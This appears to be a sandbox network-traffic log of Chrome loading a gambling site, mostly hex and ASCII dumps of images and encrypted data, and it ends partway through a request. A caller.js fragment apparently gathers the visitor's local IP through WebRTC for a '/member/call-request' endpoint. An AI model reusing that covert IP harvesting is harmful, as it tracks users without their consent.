                                                      2025-01-12 23:47:58 UTC4096INData Raw: 60 f0 ed 93 c5 f4 c6 2d 23 3d 54 b4 f8 5b 21 11 c0 3b ee 71 c8 d5 33 2f 88 3f da 34 03 e2 32 ce 5b d7 03 ef b2 41 47 c8 bb 99 05 06 b3 eb 1a 32 03 6f 0b 33 bb 4a 73 4c 6e ee f3 2c b2 e9 b2 44 14 09 92 ec 40 70 b0 a5 13 b9 8e 8d bf e4 b5 0e 87 86 56 33 86 f7 c9 bb 8f 1f fa bf be 59 29 19 0c d7 e2 db f4 84 c0 b2 f1 aa e9 9e 3b c1 73 bc 6a c8 b7 de 05 e8 25 97 6b 75 86 b7 f4 62 ed 4c 5e 62 18 c6 05 9c 75 78 57 cf 43 5b 35 bc ef 8e 3d ae 36 50 6e 98 e3 c0 9b 7c 9c 45 9d dd c5 45 03 bc 81 27 58 60 c0 48 ef 9a df 71 42 4c bd c9 25 1b b2 1b 47 5e 34 de 77 9f 3f f4 fb 09 78 cd 79 a1 7b 8f 58 d5 85 b8 c6 62 82 77 2e 4c e4 34 24 23 4c ec e6 f8 ee 74 36 85 f5 0d 35 18 8d e8 0e b9 35 9f 21 83 2b 43 5a 62 60 82 99 dd 53 d0 e7 15 5d b3 30 27 a0 e5 42 27 6c 53 f8 76 80
                                                      Data Ascii: `-#=T[!;q3/?42[AG2o3JsLn,D@pV3Y);sj%kubL^buxWC[5=6Pn|EE'X`HqBL%G^4w?xy{Xbw.L4$#Lt655!+CZb`S]0'B'lSv
                                                      2025-01-12 23:47:58 UTC4096INData Raw: 79 99 8b 9e c6 6d 06 03 f1 bb a5 98 51 4c 35 df 9a ad 2d 5a b9 01 c0 24 96 c4 d4 cc 51 4e d1 71 35 b3 4f 3e 05 d2 4a af 02 f1 bd c3 0b 49 78 2b 95 ab a0 58 05 af 8a de e7 57 b3 f6 1e 11 7c 13 c3 0b 30 3f 9c 18 5e 7a 6a 15 bc 51 18 a7 b2 7d 62 78 18 75 a8 52 f4 0d ec 43 eb 0b 5b f0 28 83 83 ec 01 8b f0 cb 4c 57 f8 2e 76 3d 72 83 10 35 8a ef 45 03 02 fe 8a 87 9c 7d e1 e0 c2 e1 c3 33 55 fa 58 78 39 b7 74 44 a5 61 15 c5 59 7d 03 a1 10 52 c3 e2 e9 d3 93 03 e5 93 a7 27 8f fa c7 c3 79 ce 23 a3 e3 13 ea 01 5b c0 8d e1 1a c9 01 e3 b5 1b 33 ec 2e 87 0d df 59 ed 70 5f ab 11 3d 3b 01 8f 35 c3 64 a2 65 99 1c 5c be 49 39 c6 e6 82 73 83 c8 0d 29 e9 d7 5f 7e f9 fa 75 ec d7 6f e3 a0 bb db f4 f9 65 ec 95 af fd f4 a7 7f fd e9 4f 9f 7b ee fc f9 f3 5e 2f 76 fb 03 0f 6c d9 ce
                                                      Data Ascii: ymQL5-Z$QNq5O>JIx+XW|0?^zjQ}bxuRC[(LW.v=r5E}3UXx9tDaY}R'y#[3.Yp_=;5de\I9s)_~uoeO{^/vl
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 47 75 d3 47 89 5d 88 c1 0b f7 cd ca ce 4e cb 4e cd 66 48 e1 9c 86 33 a4 d8 ae b4 de 42 09 6f 6e 61 de be 02 9a a0 08 63 3e e1 99 fe f1 45 18 ef f1 f1 fe 95 02 06 6f 8c f1 a6 6a 94 ca 92 b6 56 1d aa e9 48 4b 26 74 95 d5 18 fb 18 bc 08 33 a5 e5 a5 f8 8f 6a 0b fa 73 93 34 f5 86 3d 36 d0 6b b7 5a c9 58 6d 81 00 bd a6 cc 68 ca d8 95 61 44 8b 0e 66 2b 48 01 1b 6a 65 01 b3 0b 9f e1 54 70 68 af 2d 93 31 2b 95 39 3d 36 ef 1f 63 53 c4 ad 2d 3d 23 98 f2 fa 47 8a af 53 97 d3 dc 9c a3 eb c6 b4 97 6f 09 38 e2 45 12 c3 cb 8b 30 de 6f 7e b2 17 5d bb 1d 37 5f bd 19 fc 9c f1 99 8e 86 70 ef c7 2f 5e ba 74 f1 e3 1f 7f a4 8a 05 5e 1c 8d 15 df 85 f5 36 34 35 f7 28 a8 0a e1 4e 13 de fc 08 5c 9b 77 c1 77 d7 9c f0 ad cf cc e1 37 ed fc c2 9d 97 bc f6 a4 80 57 d2 b8 6e 78 77 af 7e
                                                      Data Ascii: GuG]NNfH3Bonac>EojVHK&t3js4=6kZXmhaDf+HjeTph-1+9=6cS-=#GSo8E0o~]7_p/^t^645(N\ww7Wnxw~
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 73 37 98 5b 17 bc 05 02 5e 33 23 24 8b 84 d0 5c a3 e6 59 cb 18 94 cf ae 4c 1f 3a 2d b1 e1 ea e3 c0 0b 72 e5 c5 02 6f dd 5d 17 bc 4b 2e ab 5a c3 aa 55 cf 08 ad a2 d7 29 26 d7 0e b1 f6 df b5 1f 9a 03 7e 71 00 5e 2e aa c9 9e 0b 0e 0e d2 7c df 8b 7b 3b bc c8 bf e4 bd 11 3a 85 38 31 c8 f4 40 e8 ce 2f a9 fe d9 1b f7 6f be 71 7d 5f 5e 28 21 86 f8 1e 39 88 09 40 82 5d ba 52 50 45 de d5 82 5d 1e 03 ba 80 16 c2 9b 2c 98 1d 27 d6 5e 50 d4 32 bc c5 e5 e8 66 2e a4 52 27 7e 23 ec bc 8c 5d 59 a6 86 35 42 67 c4 6f 59 a7 32 ef ba 05 e5 02 5b 7a 5d 39 56 8e bc 60 7c e4 9d d1 78 24 1e 45 e3 2c 5a 13 8d a7 03 11 50 1b 05 bc c0 d7 67 a0 0a 62 94 1c bb 76 ed d8 b5 eb 83 4e 78 59 4d 99 4e 8c 7a fc 48 33 42 6e 06 a4 26 61 bc 10 bc 37 03 7c 09 5d 76 de 6c f0 76 63 45 60 95 1b ee
                                                      Data Ascii: s7[^3#$\YL:-ro]K.ZU)&~q^.|{;:81@/oq}_^(!9@]RPE],'^P2f.R'~#]Y5BgoY2[z]9V`|x$E,ZPgbvNxYMNzH3Bn&a7|]vlvcE`
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 9a c4 d0 32 15 7a 3d 07 2e dd de c0 f0 92 b0 27 9b 26 94 2c d7 d2 66 a3 67 f8 13 d5 22 ba d8 79 7b 5a 50 b6 a8 e5 e5 18 48 36 7e 05 c1 0c 31 21 cc a9 57 1a f2 77 9c 51 82 7d 59 5c ac 60 eb c4 3b 7d dc 95 64 db 89 d6 3c db 02 af c8 0e 70 5f 3f 61 6b e3 d5 99 19 5c 98 ba 39 65 9b 35 05 50 95 d7 ba 73 03 a7 5f ba 00 da 86 23 3d 5b 97 3f 29 db 6e 35 cb 67 e3 4d c4 5e b1 f0 7f 6e a4 bf 1f 0b e3 86 13 46 3c 54 db 1a 4d c4 60 c6 14 7a a3 a3 d7 af ff bd 18 93 80 f7 9b f0 9e 29 cc 23 18 0d b5 dd 2b 1b ac 42 d3 aa ac a1 01 6f bb f6 08 e3 fd da a1 bc 0a 5d 23 f6 a1 74 1b ab 09 71 97 72 14 f4 c6 c2 be 38 e0 15 b1 21 87 9a 6b 01 99 1a c4 1c d1 47 c2 cb 7a ff 5c ac 3d 9d c1 84 8a 66 4c 7f c7 a8 74 e4 06 0c 56 9f 01 de a2 e7 b7 d1 2a e9 eb 55 6e 80 f2 0f e4 6b 78 f3 e9
                                                      Data Ascii: 2z=.'&,fg"y{ZPH6~1!WwQ}Y\`;}d<p_?ak\9e5Ps_#=[?)n5gM^nF<TM`z)#+Bo]#tqr8!kGz\=fLtV*Unkx
                                                      2025-01-12 23:47:59 UTC4096INData Raw: d8 44 15 a5 09 3f 3e e3 06 77 60 17 77 cc ae 8d de 8b 16 e7 bd 21 96 fa 27 3d b0 91 7b f1 72 e6 89 b5 73 50 18 bb 20 7c 54 84 85 a7 05 95 80 f6 94 de 0c f3 14 33 2b 18 c7 3b df 72 13 cd d1 21 91 5d b3 f3 36 c1 78 87 c5 18 02 d0 23 52 c3 ac 5c 5c 80 2c 2d b4 a0 da 6b 88 0d a7 09 5e 14 1b c0 ee e0 f0 e8 c9 c9 1d 25 0a 1a 09 2f 09 a6 49 5b 03 11 8e 12 5e 5b f7 19 8b 89 d6 f0 9a 0d b6 62 9a 80 29 aa bc 9c 1b a4 ca 06 b7 8d a6 1f 09 af 7a bc 6c 59 77 c5 63 c0 fb b1 cf c1 9d 1f 4b c8 0d 3c b4 4c 06 5e 9c c1 df fe 02 ce fb 0f fa 98 05 4b ce 0d 2e f1 68 07 7a 21 7b 6c 97 41 81 2f b8 4a 25 17 db 95 64 78 5b 28 3b d0 7e 6c c1 a2 1e b0 27 e1 45 42 18 a3 34 81 6f 84 50 7c 40 33 0e 3e 9c ca 64 34 bc 24 ac b8 d6 8c 07 1b b0 c2 59 33 41 2a be 6c 6e b9 08 4d 9c 97 1a 13
                                                      Data Ascii: D?>w`w!'={rsP |T3+;r!]6x#R\\,-k^%/I[^[b)zlYwcK<L^K.hz!{lA/J%dx[(;~l'EB4oP|@3>d4$Y3A*lnM
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 3e 1e 1a bc c9 fe 72 44 e7 ec cb e4 5d b0 3b 1d 8d 0d 86 42 33 05 69 67 d9 a5 34 cf 2e d5 7b 23 f0 95 e2 d3 17 f6 d1 80 59 8d 12 85 34 3d 0d 7c d3 fe c3 35 3f 0c dd 06 a8 aa 81 00 7e e2 89 4d ae d8 f1 29 26 94 19 9a 01 6f 33 e0 8d 0c 26 b4 a4 b3 f0 0a 6a e1 bd 18 b4 7d ff 4f 09 58 ca 53 e4 86 d0 cf df c3 66 ea a1 77 c6 0d 52 a2 c5 8c d9 af 51 b4 a4 63 8e e2 ff 24 b8 2b 7f a6 3b a2 f5 8a 8d 1b f1 16 0e 4c 5b f1 9c 4a eb 48 54 47 58 b1 6e 3d 9e d7 33 a9 4f 14 14 a4 d6 30 65 64 fc e8 9b 82 c9 e7 01 ee e6 d5 d0 27 61 b0 5c ef 6e c9 46 25 0c ca 7e fe 6f 02 e7 1f 6d d8 b0 6a 15 ee a4 b5 10 9e 56 26 29 3d ad 6d 76 a2 f5 62 77 c8 33 3a dc e3 09 74 4f 44 c3 db 18 b9 99 ab b2 6b f7 74 f7 11 b8 fc 02 ed 76 dc 55 76 41 2d a0 65 c2 ab 9a 55 3a ac 06 f8 f5 d3 68 01 fc
                                                      Data Ascii: >rD];B3ig4.{#Y4=|5?~M)&o3&j}OXSfwRQc$+;L[JHTGXn=3O0ed'a\nF%~omjV&)=mvbw3:tODktvUvA-eU:h
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 9c eb b3 1f ad c0 f0 68 e0 72 1c ce f5 36 15 40 5d 81 13 18 db 83 93 ae 48 13 5f 63 23 0b a8 49 dc f0 f1 d1 36 84 5e 8a 0d 93 dd e8 e1 29 58 b4 55 41 2e 33 2b 94 75 0b 26 8a a0 03 d8 4c 2f 10 0a b1 12 c3 d8 cc 58 ac 3b 4f fc b7 c1 22 71 2b e8 c5 36 79 3a a9 d8 b2 53 f6 a7 3e 40 01 21 bf 09 ff 20 84 b5 5f 2c 1a 2e 36 17 40 b9 e9 80 77 69 7c 1b 5e 51 94 eb f1 ea ee cb 5f be 34 d2 db de da fb 26 4b c0 d0 77 0e 1f ae 89 04 9a 1a 4e 41 e7 a6 78 47 6f c4 17 1c 19 1b 8b 1e 15 d2 b6 a4 1b 67 e7 0d 41 72 5c e3 d4 c2 9c d1 b8 10 4a 55 7f 60 07 8b 05 cf 90 9c 7c 23 f1 17 94 1b 8c 2e 4e 2d 0e 2b 98 f1 0a 5c 05 b2 32 2e 2c 29 1d ba 4b c2 2b bb 6c fc 20 d7 a5 94 d7 59 9d 7b d6 a4 b0 dc 3d fe 0a 1d bb 52 16 c5 51 a1 a3 f7 71 e1 95 25 b3 34 ae 73 23 2f b1 3a a8 b9 9e 77
                                                      Data Ascii: hr6@]H_c#I6^)XUA.3+u&L/X;O"q+6y:S>@! _,.6@wi|^Q_4&KwNAxGogAr\JU`|#.N-+\2.,)K+l Y{=RQq%4s#/:w
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 7b 08 60 65 5f 46 b9 d2 21 db 20 4b e0 ac 25 40 96 4e 14 07 f0 66 32 a8 99 d7 4f 89 82 1a 1c 48 8e 76 08 f0 3e de b4 70 1a 6e 4b e1 bb 4a 5f 2b d3 37 89 61 e0 96 80 44 4d a5 0e 5e b6 cf 1d 3c 17 c2 2a 4c 3a 29 cc 5f dc 41 05 7b 52 40 78 59 7c 09 73 dc 85 04 bb fa 01 db 52 ce db d0 20 36 2d 65 f4 0a ef 65 d6 5b 9a 75 07 d8 32 bd 7c 29 64 b5 f6 3a df 12 e4 52 99 6c 17 56 8c 34 71 e7 2d ed e4 ab 87 bd 53 72 b3 32 d4 1a 68 a5 3b 5d ab 0a d7 08 42 6b d9 84 6c 49 07 bc bf f2 bd 33 ee c3 8a 91 77 42 bd 34 b6 d6 15 cd 58 4b 7a 12 b7 da ba 30 ef 81 38 98 53 95 53 c5 82 af b6 21 72 79 db 5d be f7 7c 9f 84 57 a3 52 2c c3 87 8d 3a f7 60 82 c2 e1 48 6c e2 75 a9 7d 64 eb da fc f8 8e d5 62 b5 ba da 76 89 49 0a 83 d2 86 e0 0a a4 dd 07 78 c1 76 fb 7f d2 49 b6 24 12 b5 79
                                                      Data Ascii: {`e_F! K%@Nf2OHv>pnKJ_+7aDM^<*L:)_A{R@xY|sR 6-ee[u2|)d:RlV4q-Sr2h;]BklI3wB4XKz08SS!ry]|WR,:`Hlu}dbvIxvI$y


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      109192.168.2.44986020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC388OUTGET /common/storage/cms/cms_1051.png?ver=1611754184 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:59 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 10801
                                                      Connection: close
                                                      Last-Modified: Wed, 27 Jan 2021 13:29:44 GMT
                                                      ETag: "60116ac8-2a31"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:59 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b9 00 00 00 fe 08 03 00 00 00 51 2e 54 ba 00 00 02 fd 50 4c 54 45 00 00 00 05 50 49 5f 73 83 10 67 5b 00 60 55 16 62 5c 00 62 56 00 62 56 00 63 57 00 62 56 00 63 57 02 4e 47 1d 42 42 02 4e 47 02 4e 47 ff ff ff 28 25 2b 2a 2b 35 5f 73 83 00 57 4d 00 5b 50 00 63 57 00 60 54 fe e4 19 00 5e 52 28 27 2f 01 4d 45 00 50 47 00 52 48 00 4b 42 00 54 4a 02 38 32 21 22 29 1c 1c 23 c0 d3 d1 17 18 1d 01 48 40 00 9f 7b 10 b6 9b 01 30 2c 02 40 3a 0f ad 94 e0 ea e9 26 2a 33 ef f4 f3 12 13 17 81 a7 a3 41 7b 75 12 c1 a5 01 48 43 10 bd a1 01 43 3c 0e 9f 87 04 67 57 8a 8b 8e be be 26 cf df dd 7f aa a5 40 82 7a 19 34 36 0d 8f 7a 06 6f 5f 33 70 6b 09 54 4c a0 bd ba c0 d5 d3 09 7f 6c 12 5a 53 40 44 4c b0 c8 c5 8f b1 ae 21
                                                      Data Ascii: PNGIHDRQ.TPLTEPI_sg[`Ub\bVbVcWbVcWNGBBNGNG(%+*+5_sWM[PcW`T^R('/MEPGRHKBTJ82!")#H@{0,@:&*3A{uHCC<gW&@z46zo_3pkTLlZS@DL!
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 65 ef b1 5b 30 80 d4 bd 54 5b f5 55 dd e5 10 d9 3d 1f e0 29 ea 5c 79 3e 4a 6b e9 e6 6f e5 ec 52 e3 9f 8c d0 83 9c c1 f8 fc 10 7f 6c f2 fe c3 f1 c0 b1 33 f3 5a ba 41 13 76 70 f3 1f cb 20 6b e8 26 57 f2 98 df c2 e0 b8 f8 c9 6f 1b c6 64 f8 fb e9 2e c7 f0 51 46 09 6f 47 74 9c 7f 5a 1e e5 13 34 88 23 bb 77 ef b6 1f 16 e9 8f 18 e6 bf 90 1b 46 02 34 7d 18 4e 50 31 fc 95 04 d0 a3 88 8e f3 8b 72 56 70 38 06 07 1d 0e 9b 60 20 8c 5a 6e 51 57 3c 3f 44 d3 11 70 cb c9 31 0f 36 aa e9 8b 37 18 88 23 0c 0e da 38 c6 b4 61 83 69 89 05 5e eb c6 6b e5 90 76 c9 5f 95 e9 04 86 f3 d7 13 43 14 cf 30 43 20 57 e8 c4 72 c1 c1 39 a7 77 34 6b b5 46 a3 56 6b ae 1c ae d2 0e 9b 41 6f b4 72 6c 8f 0a 17 69 5a 86 9f 67 98 c3 3c bf 8b d9 55 36 c8 74 72 b9 60 33 ed 5d db 48 65 2e c8 49 36 6a
                                                      Data Ascii: e[0T[U=)\y>JkoRl3ZAvp k&Wod.QFoGtZ4#wF4}NP1rVp8` ZnQW<?Dp167#8ai^kv_C0C Wr9w4kFVkAorliZg<U6tr`3]He.I6j
                                                      2025-01-12 23:47:59 UTC2965INData Raw: d0 14 40 29 e4 91 61 86 92 fd b3 df b3 c8 2c 71 b3 c6 1a 8d a2 7e b4 b3 de bc 92 d7 40 ae a2 90 18 35 06 47 5e 89 44 65 08 c9 02 aa 3d f9 0f a5 66 c1 dc 93 8f 84 37 10 ed d0 b3 86 2d 57 05 a2 5c f1 51 c8 6b 7f 47 04 7d e6 bb 2d 43 2d ca 38 e2 8e 63 5d a4 dc 94 3f 6f 5c c2 43 e3 41 cc 73 c0 66 28 88 31 44 75 e4 d5 80 1a 92 57 56 08 95 27 17 e6 55 10 70 ae 2c 26 71 20 79 b2 5c 2c 68 29 56 8d 86 bb d7 19 c1 35 b1 b1 4c 4e 26 5b 4a 9f 23 1f c2 c9 27 71 5f b8 43 cc 52 87 43 7d 7d 7c 3e 20 57 09 cc 00 36 82 42 74 e4 c9 eb 70 c8 a0 2d 8a 56 6d 99 32 b9 68 16 bc 78 6b bb 5b f3 94 02 6a e8 68 2f 21 d7 ae d5 da a6 ed 6a 2e d8 7b f2 12 85 83 d2 30 28 3a 5e 82 61 a8 19 00 c3 16 39 05 b8 53 25 a7 87 e4 f9 c5 e4 be 55 29 8c 07 df 93 6f 7a 8d 36 1d f2 1a 61 92 28 03 a2
                                                      Data Ascii: @)a,q~@5G^De=f7-W\QkG}-C-8c]?o\CAsf(1DuWV'Up,&q y\,h)V5LN&[J#'q_CRC}}|> W6Btp-Vm2hxk[jh/!j.{0(:^a9S%U)oz6a(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      110192.168.2.44987020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC623OUTGET /images_plus/footer/footer-18plus.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:59 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 441
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-1b9"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:59 UTC441INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 04 03 00 00 00 81 54 67 c7 00 00 00 30 50 4c 54 45 00 00 00 98 98 98 8a 8a 8a 7c 7c 7c 3d 3d 3d 60 60 60 35 35 35 2c 2c 2c 4a 4a 4a 50 50 50 82 82 82 8f 8f 8f 6d 6d 6d 59 59 59 44 44 44 76 76 76 ce c3 06 63 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 01 37 49 44 41 54 28 cf 65 91 bd 4a 03 41 14 85 4f fe 8c c1 9f ec 99 49 22 18 c4 2c 42 4a 49 2c 2c 65 13 11 c1 34 06 6c 85 28 58 0a 01 c5 c6 66 7d 03 35 5d b4 30 20 82 58 59 6a 95 ad 62 63 61 63 65 61 ed 53 b8 73 d9 cd 6e c8 57 cc 85 6f e6 dc 61 ee 40 d8 79 21 df 0f 10 92 ed 53 78 0e c5 36 d5 47 e7 e2 de e6 13 84 59 6a c7 d4 74 5d fd 8a b8 2b bb c1 8e fd 26 85 9b 08 d8 a3 39 d2 52 dd 71 77 bb 0a a0 ee 2f 21 4d 6d 12 6e 24 72 7e 26 b9 8a
                                                      Data Ascii: PNGIHDR Tg0PLTE|||===```555,,,JJJPPPmmmYYYDDDvvvctRNS@f7IDAT(eJAOI",BJI,,e4l(Xf}5]0 XYjbcaceaSsnWoa@y!Sx6GYjt]+&9Rqw/!Mmn$r~&


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      111192.168.2.44986920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC546OUTGET /assets/js/caller.js?ver=1675418257 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:59 UTC317INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 4386
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Fri, 03 Feb 2023 09:57:37 GMT
                                                      ETag: "63dcda91-1122"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:59 UTC3779INData Raw: 2f 2a 2a 0a 2a 0a 2a 2f 0a 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 09 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 09 76 61 72 20 6c 6f 63 61 6c 69 70 2c 0a 09 61 6a 61 78 55 72 6c 20 3d 20 27 2f 6d 65 6d 62 65 72 2f 63 61 6c 6c 2d 72 65 71 75 65 73 74 27 3b 0a 0a 0a 09 69 66 28 24 28 64 6f 63 75 6d 65 6e 74 29 2e 64 61 74 61 28 27 63 61 6c 6c 65 72 27 29 29 0a 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 0a 0a 09 24 28 64 6f 63 75 6d 65 6e 74 29 0a 0a 09 2e 64 61 74 61 28 27 63 61 6c 6c 65 72 27 2c 20 74 72 75 65 29 0a 0a 09 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 74 72 79 7b 0a 09 09 09 77 69 6e 64 6f 77 2e 52 54 43 50 65 65 72 43 6f 6e 6e 65 63 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 2e 52 54 43 50 65 65 72 43 6f 6e 6e
                                                      Data Ascii: /****/(function($){'use strict';var localip,ajaxUrl = '/member/call-request';if($(document).data('caller'))return false;$(document).data('caller', true).ready(function(){try{window.RTCPeerConnection = window.RTCPeerConn
                                                      2025-01-12 23:47:59 UTC607INData Raw: 63 5c 27 2c 20 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 5c 27 23 31 33 31 33 31 33 5c 27 2c 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 20 29 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 7d 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 2e 63 61 6c 6c 69 6e 6e 65 72 20 69 6e 70 75 74 2c 2e 63 61 6c 6c 69 6e 6e 65 72 20 62 75 74 74 6f 6e 20 7b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 68 65 69 67 68 74 3a 20 32 36 70 78 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 36 70 78 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 33 33 3b 27 3b 0a 09 09 73 74 79 6c 65 2b 3d 27 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20
                                                      Data Ascii: c\', endColorstr=\'#131313\',GradientType=0 );';style+='line-height:40px;';style+='}';style+='.callinner input,.callinner button {';style+='height: 26px;';style+='line-height: 26px;';style+='background:#333;';style+='border:1px solid


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      112192.168.2.449868111.45.3.1984434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC880OUTGET /hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&rnd=450682172&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=1&sn=48177&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2F%23&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91 HTTP/1.1
                                                      Host: hm.baidu.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
                                                      2025-01-12 23:48:00 UTC275INHTTP/1.1 200 OK
                                                      Cache-Control: private, max-age=0, no-cache
                                                      Content-Length: 43
                                                      Content-Type: image/gif
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Pragma: no-cache
                                                      Server: apache
                                                      Strict-Transport-Security: max-age=172800
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close
                                                      2025-01-12 23:48:00 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                      Data Ascii: GIF89a!,L;


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      113192.168.2.44986720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC618OUTGET /common/storage/cms/cms_1143.png?ver=1708958748 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
